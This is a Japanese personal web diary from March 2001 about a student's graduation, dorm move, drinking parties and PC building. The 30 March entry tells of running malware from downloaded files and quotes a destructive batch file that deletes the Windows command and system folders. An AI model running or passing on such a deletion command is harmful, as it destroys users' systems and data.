[トップページへ] [他の月を見る]


みの日記

( 2001/04 ← 2001/03 → 2001/02 )


[ 今日も引っ越し関係 ]
今日は朝もはよから友達の引っ越し手伝ってました。
アパートの一階から二階に荷物を運びあげるだけでしたけど。
自分の引っ越しの時もそうでしたけど、あの狭い6畳程度の部屋にどうやってこんなに沢山の荷物を隠し持っていたんだ?、ッて思いました。

神秘ですねぇ(謎)


そう言えば今日で今年度も終了ですな。

特に何も変わらないんですけど、何となく新しい気持ちに切り替えたい気分です。
つーか、このnikki.cgiって、月が変わると前月のが見づらくなるので、おそらく今日の「ぼやき」を見る人はほとんど居ないでしょう。

…………「今日の」に限らず、いつも誰も見て無かったりして…………(笑えない)(・・;)
2001/03/31(土) 晴れ


[ あんぐらーグラグラ。 ]
今日一日暇だったので、ずっと、ネットサーフしていました。
んで、あるサイトで色々と面白そうなファイルを見つけたので大量にダウンロードしました。
GIF,JPG,ZIP,LZH,PNG,EXEなどのファイルがあってとりあえずすべて落としてみました。

んで、一つ一つのファイルを見ていたら、SCRファイル(スクリーンセーバー)がありました。
何気なく実行してみると画面が真っ赤に…………(汗)
NortonAntiVirusがウイルスを関知した画面が出たのです。

…………むぅ………最近ではスクリーンセーバーにもウィルスが感染するんですねぇ………しみじみ。

今度はZIPファイルを解凍しました。
するとまた画面が真っ赤に。
またもやウィルスが…………。
今度のは「W95.CIH」別名「チェルノブイリ」というウィルスで、感染しているシステムの日付が26日になるとシステムを壊してくれるというとても親切なものでした。

ノートン先生マンセー(笑)

更に。
今度はEXE(実行)ファイルがありました。
いかにも妖しいにおいがぷんぷんしていたのですけど、無謀にも実行してみました。
すると、一瞬だけDOSプロンプトが出てすぐにリセットがかかりました。
画面には、いつもは表示されない「BOOT-UP DOS BASED WINDOWS98」とかいう文章が表示されてました。
私もう、あせってリセット押して、祈るように起動画面見つめてました…………(汗)
んで、やっぱり上述した文章が表示されました。
もうがっかりして、復旧のことだけを考えてました…………(涙)
すると、きちんとWindows98が起動しました。
…………ほっ…………。
というわけで、今、この文章を書いているのであります。
ちなみに冷や汗をかかせてくれたEXEファイルは、LZHの自己解凍ファイルで、中にはBATファイルが入っていて、

@echo off
del c:\windows\command\*.???
del c:\windows\system\*.???
@exit

というコマンドが書かれていました。
commandフォルダとsystemフォルダの中のファイルをすべて消してくれるというものですね。
何故かCOMMANDの中のファイルは全然消えていませんでしたので、とりあえずは安心……。(´。`)ホッ
このBATファイルの他にsetup.exeというファイルも入っているんですけど、これ…………どうしようか…………(汗)
これが何であるか、どうにかして確かめたいんですけど…………怖いし…………むぅ…………。
2001/03/30(金) 晴れ


[ 引っ越し王 ]
残った荷物を運び込んで、とりあえず引っ越しは終わりました。
しかし………、長岡を出ていく先輩方からいただいた「コタツ」「冷蔵庫」その他家電がまだ搬入を待っています。

…………貧乏人根性で、「頂けるならなんでも頂きます」なんて言わなきゃよかった…………(涙)
2001/03/29(木) 雨


[ お引っ越し中。 ]
昨夜は結局3時頃まで箱詰めをやることになってしまいました。
んで、今朝は7時起き。
…………あぁ、眠い(_ _).。o○

昼頃まで箱詰めをし、昼に友達3人が車2台で到着。
仕事の報酬を意味する”昼食”を進呈し、引っ越し手伝い契約を締結。
………むぅ……安さが勝負の学食で2500円も支払うことになるとは…………(涙)

…………なぜ、このような出費をしてまで引っ越しを手伝ってもらわなければならなかったのか。
それは、我が部屋が寮の五階にあるということが理由なのである。
…………一階から五階までを何往復もしたくないよね〜、やっぱ。

引っ越し先に荷物を持っていくと、部屋の壁紙、ふすまの張り替え作業が行われていました。
せっかく運び込んだ荷物は、押入に入るだけしか搬入できず、結局、明日も引っ越し作業がまっているのです。

ぐはぁ。
今夜は何処で寝よう…………(汗)

…………寝袋もって他人の部屋へGO!(笑)(っ゚ワ゚)っ
2001/03/28(水) 曇り時々雨


[ お引っ越し。 ]
うちの大学の寮は最大2年までしか住むことが出来ないため、追い出されることになりました。
そゆわけで、今、部屋の荷物をまとめています。
おそらく、段ボール箱20個分くらいになりそうです。
……………………うぁぁ、面倒くせーー。

入った直後は厭でしかなかった寮も、住めば都、というように、結構いい感じでした。

……………

…………

本当にそうだったか?

近くの部屋からは奇妙な笑い声が…………。
別の部屋からは女性のあえぎ声が…………。
真夜中に尋常じゃないボリュームの音楽が…………。
しかも、その曲に合わせて下手クソな歌声が…………。
隣りの部屋からの話し声が五月蠅くて眠れなかった日も…………。
夏になると40度を超える室温になり…………。
冬になると氷点下近くまで下がり…………。
部屋の広さは6畳と書いてあったがどう考えても4畳半だったり(タイル敷きだから解らない)…………。
家賃が安いことと学校に近いことだけが取り柄の…………。

そんなところが本当に「住めば都」だったと言えるのか…………?


…………

……

退寮バンザイ!!!(笑)
2001/03/27(火) 曇り


[ 酒は飲んでも飲まれるな for わし。 ]
ついに、大学を卒業いたしました。
もう、学生では無いのです。

……………………ええ、学生ではないのですよ。

院生。

何故か、奇跡的に大学院に合格いたしまして、4月からは院生になります。
まだ、親のすねをかじって生きていきます。

…………つうか、実は今現在、親のすねは全くかじってないんですけど…………。
仕送りが無いのです…………(爆)
いやぁ、仕送りなしでバイトもせずによく暮らせますな、わし。
日本育英会さまさま、奨学金さまさまって感じです(笑)

………奨学金っつうことは、よーするに、借金ですな。
あれです、利子がない、または、利率の低い学生ローンみたいなものです。

そういえば奨学金で思い出しましたけど、福島県って、全国で一番、奨学金が返ってこない県なんだそうです。
学生ローンで金借りて返さないって感じかな?
質(たち)悪いね! 福島県!!

……………………ってわし福島県民やん(笑)




…………脈絡のない文章とはまさにこの事ですね(笑)
ま、酔っぱらいのしたことなんで気にしないでください♪
2001/03/26(月) 晴れ


[ ぐはぁ ]
学校の寮を追い出されてしまうということで引っ越しです。
…………2年間で部屋にある荷物は倍になりました…………(涙)
引っ越し王日通に頼もうにも、引っ越し先が徒歩10分の所なのでもったいないし………。

あぁぁぁぁあ、面倒くさい(-_-;)


あ、そいえば、友人から頼まれていたPCが完成しました。
全く何もエラーが起こらずに、スムーズに完成したので驚いておりまする〜〜。
んで、明日引き渡し。

…………赤貧状態からの、一時的な脱出です♪(爆)
2001/03/23(金) 晴れ


[ いい加減HPの更新も面倒になってきましたね。 ]
そもそもうちのサイトが出来たいきさつはというと、

学校でネットに繋げられるようになる(98' 4月中旬)
      ↓
友達とメールのやりとりをするようになる(98' 夏)
      ↓
チャットというものを知る(98' 夏)
      ↓
YAHOOで検索して、一番上にあったサイト(Natsuki's Bar [JUNK](当時))に行ってみる(98' 9月15日)
      ↓
いつ行っても常に誰かが常駐しているような人気サイトで、顔も知らぬ人との会話にどっぷりとハマる(98' 10月〜)
      ↓
[JUNK]閉鎖・AA Cafeと名前を変える(98' 10月)
      ↓
チャットで話をしていた人たちが次々とHPを開設していくのを見て、自分も作りたくなる(10月半ば)
(おそらくは、AA Cafeが無くなっても連絡が取れるようにするために)
      ↓
GEOCITIESに[deepskyblue]をひっそりと開設(98' 11月3日)

とまぁこんな感じで、特に大きな目的や野望が有ったわけではないのです。



そーゆーことで、全然更新しないんでしょうねぇ。


そういえば、「ちょびッツ」をようやく読みました。

…………ぐはぁ。
CLAMPらしくないと言うか………らしいというか…………。
私の心の中心にある琴線に触れてまいましたわ(笑)
むぅ…………買ってこよーーーーーーー(^ー^)

ちぃ…………。
2001/03/22(木) 晴れ


[ 今朝、首つりました…………。 ]
…………驚いた?(笑)
ぢつは、変な格好で寝てて首があさっての方向を向いていたせいで首筋の筋肉がつっただけなのです(笑)
普通、ふくらはぎとか太股とか腕などはよくつりやすい場所ですけど、首はつらないですよねぇ(笑)
私って、普段から運動不足なこともあって、ちょっと激しい動きをしただけで簡単に様々な部位をつるのです。
腰、腹筋、肩、胸、足の裏、一番珍しい部位だと顔(ほっぺたの上部)もつったことがあるんです(爆)
もう、松方弘樹も驚くほどつりまくり(入れ食い(笑))ですねぇ。
2001/03/21(水) 晴れ


[ ついに”マルチ”が開発されました!! ]
あの笑顔が…………、あの切なさが…………、あの夕焼けに佇む姿が…………今あなたの元に!!
今すぐにその姿を!!
企画書と写真と仕様書が掲載されています。


…………うぅぅ……ずびばぜーーーーーん!!!(笑)



メインとして使っている銀行の口座の残金がついに…………。
ついに3桁になりました。
正確には443円。

…………引っ張るようなネタでは無いですねぇ…………。

しっかし………まずいなぁ…………(汗)
今月末には電話代も引き落とされるのに……………………(大汗)

大変だなぁ………………………………。
2001/03/19(月) 晴れ


[ 爛れきった生活 ]
結局、昨日の飲み会(送別会)では、二次会三次会までなだれ込み、今朝の6時近くまで延々と飲み続け、話し続けてきました。
一応、酒には強い方なので、大抵の飲み会では最後まで話し続けられる、ということが原因でしょう。
…………早めに眠ってしまえばよかった…………。
だって、最初は6人で飲みながら話してたのに、段々と死体が増えていって、気付くと2人になってたんですもの(涙)
ま、これはこれで(これはこれで!!)楽しいのですけど、体調おかしくして当然ですよねぇ…………(笑)。
2001/03/18(日) 晴れ


[ 爛れた生活の中で2 ]

「お世話になりました、皆さんさようなら。」

街の至る所でこんな台詞が飛び交う季節がやって参りました。
ご多分に漏れず、私の周辺でも飛び交っております。
それで、この台詞が飛び交うところには、送別会、という行事も付属するように行われております。
ご多分に漏れず、私の周辺でも行われております。

つうわけで、送別会・追い出す会が大挙して襲ってきています。
昨日・今日・明後日・明々後日・明々々後日、ひたすら飲み会です(爆)

……一週間で五回も飲み会するなよ…………(涙)
体調も財布も気分も最悪な状況が継続中です…………。
2001/03/17(土) 晴れ


[ そんでもって結局…………。 ]
みんなで泊まり込みでした(爆)

……本当は、眠くなったら帰るつもりだったんです…………。
それが、その場のノリで「ま、いっか〜」って事になって、帰りづらくなって、気付いてみると朝日が昇っていました(涙)

研究室に泊まり込んだのは4人。
ただぼーーっと反応器を見て、特に異常がなければ寝ててもいいような実験です。

つーわけで眠気覚ましにぼーーーーっとゲームしてました。
一人が「かえるにょ国にょアリス」、二人が「BM98」を。
ただぼーーーーーっと、延々と、眠そうな顔をして、暇そうにやっていました。

あぁ…………眠い(_ _)(-.-)(~O~)ファ・・・(~O~)(-.-)


とりあえず、深夜のネットサーフィンで、色々なもの(法に触れるかもしれないもの)を拾ってきました。
はぎやまさかげの昔の同人誌のJPEGや水無月徹などの同人誌のJPEGなどなどでござる。
………ふっふー♪
”元”Leafファンの私としては嬉しいものが拾えましておめでとう、って感じです(笑)

…………でも眠い……………………。
2001/03/14(水) 晴れ


[ 楽しい楽しい大実験です。 ]
31時間もの間、延々と反応させ続けるという実験をしています。

…………といっても私の実験ではないんですけど。

同じ研究室の人がこういった実験を行うということで、ちょっと遅くまで研究室に残って居ることにしました。
大体、日付が変わるくらいまで居ようかな〜と思います。
もちろん、その実験している本人は泊まり込みです。

………とかなんとか言って、ぢつはいつも日付が変わるまで研究室にいたりています。
…だって、ネットしほうだいなんですもの…………(爆)
2001/03/13(火) 晴れ


[ 爛れた生活の中で……。 ]
研究室の都合で、先週の木曜日から日曜まで4連休でした。
つーわけで、色々と無茶してきました。

日付が変わるまで研究室で馬鹿お絵かきしたり……
徹夜で先輩のパソコン組み立てたり……
100m先の見えない吹雪の中を自転車で駆け抜けたり……(顔がしもやけになりました…(爆))
友人宅で酒飲み&コタツで雑魚寝……

……………………風邪ひきました(爆)
二日酔いとあいまって、激しい頭痛がいい感じでした…………。

あぁ、不摂生(笑)
2001/03/12(月) 晴れ


[ こら、なんばしよっと!!って感じぃ?(爆) ]
昨夜から今朝にかけて、先輩がPC自作するのを手伝っていました。
もう、1ヶ月ほど前から延々とパーツ集めをしてらして、ようやく、と言った感じです。

…………つうか、実は一度電源を入れるところまでは行ったんですけど、電源BOXから煙を吹いて中断していたのです。

そゆことで、0時半ころから始めて今朝の5時半までかかりました…………。
それは、なかなか電源が入らなかったからです。
それは、マザーボードをケースに固定するときにスペーサーを挟まなかったためにショートしてたというのが原因でした。

………もしかして、前に電源燃やしたのもこれが原因だったのでは…………(汗)

というわけで、とりあえず動くようになりました。うん、よかったよかった。
Duronの800MHzなんですけど、はっきり言ってめちゃめちゃ速かったです。
うちのPentiumIII 866MHzなんて目じゃないほど。
…………なんでやーーーー(涙)

んで、そのお礼にということで、SocketAのマザーボード(多分壊れている)と300Wの電源(正常)とミドルタワーのケースとFDD(正常)をもらいました…………やったー。
雷鳥Athlon買ってきてNewMachine組もうかと思ってしまいました。
2001/03/09(金) 晴れ


[ 総務省とのつながり…………。 ]
総務省の通信総合研究所のHP(うちのindexからもLinkしてある日本標準時のサイト)にある
非常時通信研究室のサイトに、不正アクセス関連リンク集というものが作られました。
そのリンク集の説明文は↓です。

>以下のリンク集は,非常時通信研究室の室員のために作成したものですが,不正アクセス
>問題に興味がある方の参考になると考え公開することにしました。

さてこのリンク集からはどんなHPにリンクされているのでしょうか。

…………というわけで、ここがそのリンク集です。


……………………うぁぁぁぁ、2chにリンク張ってあるよ…………(笑)
2001/03/07(水) 晴れ


[ 今日 ]
先日友人に頼んでおいた256MBのメモリが届きました。
…………今持っているSDRAMの総メモリ量が1.5GBになりました。
これを3台のパソコンに割り振るので、一台当たり512MBってとこですねぇ。

…………うあぁぁ。
安いからって増やしすぎですねぇ…………馬鹿みたい……わし。

そう言えば、100BASE-TXのスイッチングハブを通販で注文したので、LANで繋いで、友人とNETゲームが出来るようになります。
うれしいねぇ…………。

……つってもマシンパワー足りなくてDIABLOの1位しかできませんけど。
あ、AOEもできるかな…………?
QOH99のNET対戦も可能か…………。
UOは無理だろうなぁ…………。

…………結構色々出来そうで楽しみです♪
2001/03/06(火) 晴れ


[ さてさて ]
ニュースが風化する前に書いておきましょうか。

先日、蟹江ぎんさん(108歳)が老衰で亡くなりました。
成田きんさん、蟹江ぎんさん、この双子の姉妹が初めてTVに出演したのは、7年ほど前の敬老の日のNHKの番組でした。
当時はどこにでもいるような、ごく普通の100歳のお婆さんでした。
しかし、徐々にマスコミに取り上げられ、世間に広く知られるようになるに連れ、生き生きして見えるようになりました。
とても100歳を超えているようには見えないような、せいぜい90歳くらいの若さ(若いか?)に見えるようになりました。
一年と経たないうちに”日本のお婆ちゃん”と呼ばれるほど有名になり、誰からも愛されるようになりました。

このとき私は、「ずっと、ずっっっと元気な姿を見せてくれる」そう思っていました。

しかし、あれから6年が過ぎ、日本中に衝撃が走りました。
成田きんさんが107歳の若さで亡くなったのです。
いつかは来ると思っていた日が、来て欲しくはなかったその日が、ついに来てしまったのです。
不謹慎かもしれませんが、このとき私は、「ぎんさんが逝かれる日も遠くないな」なんて思っていました。
……………そして一年後の今年、蟹江ぎんさんも亡くなりました。

永遠の終焉。

中学や高校、大学の2年生のころって、ずっとこんな生活が続くのだろうなぁ、などと無意識のうちに思っていました。
しかし、3・4年の、卒業が近い季節になると、終末を意識すると、やっぱり何事にも終わりが来るんだ…、と気付く。

変化は重要だけど、変わらないことも必要ですね。




……ふと、「永遠はあるよ」って言葉が頭に浮かんだんですけど、安っぽい言葉って感じがしました。
2001/03/05(月) 晴れ


[ あるニュースサイトを見ていたら載っていたのですが。 ]
なんか「1/1マルチ人形」が発売されるらしいです(→参照)。
21万円だそうで…………。

…………こんなもん買う人居るんですかねぇ…………(汗)

……等身大と言えば、昔まだエヴァンゲリオンが社会現象化していた頃に、綾波レイの等身大人形が発売していましたっけ……。
あんときは確か、28万円だったかな…………?

なんつーか……………間違っても手を出したくない世界ですね…………(汗)

ちなみにこのマルチ人形は、耳カバーが外れて"あそこ"(爆)が見えるッぽいです(笑)
2001/03/04(日) 晴れ


[ 今日も引き続いてあれ以外の何か with "任意"につい ]
2日ほど使ってみて思ったことですけど、なるほど確かに"任意"って愛らしいですねぇ。
世の中の大きなお友達(萌えるお兄さん(笑))が熱狂するのも解るような気がします。
がしかし、私にはまだ"ちっぽけな"プライドが残っているのでそこまでは行きたくないのです。
つうわけで今現在のスキンは「だぶるうにゅう(みのカスタム)」です(笑)
元々このスキンの"うにゅう"は普通の大きさだったのですけど、メッセージ窓が見切れてしまうので大きくしました。
丁度3倍の大きさです。

…………今ではめっちゃお気に入りです(笑)
2001/03/03(土) 晴れ


[ ついにあれ以外の何かが私のパソコンに…………。 ]
思っていたよりパソコンの中がいじくりまわされていなそうな感じですね。

とりあえず、時計合わせの機能を使ってみました。
…………400秒もずれてました。

「…400秒くらいほっといてもいいと思うけど…」
………ほっとけるかっ!!(笑)

つうわけで、駄目駄目です。
なるほどね〜、世の中の大きなお友達が壊れるわけだ……………………(謎)。
2001/03/01(木) 晴れ


( 2001/04 ← 2001/03 → 2001/02 )


[ 管理者:みの。 ]


- CGI-Island -

Thanks to CGI-StaTion & 手作りCandy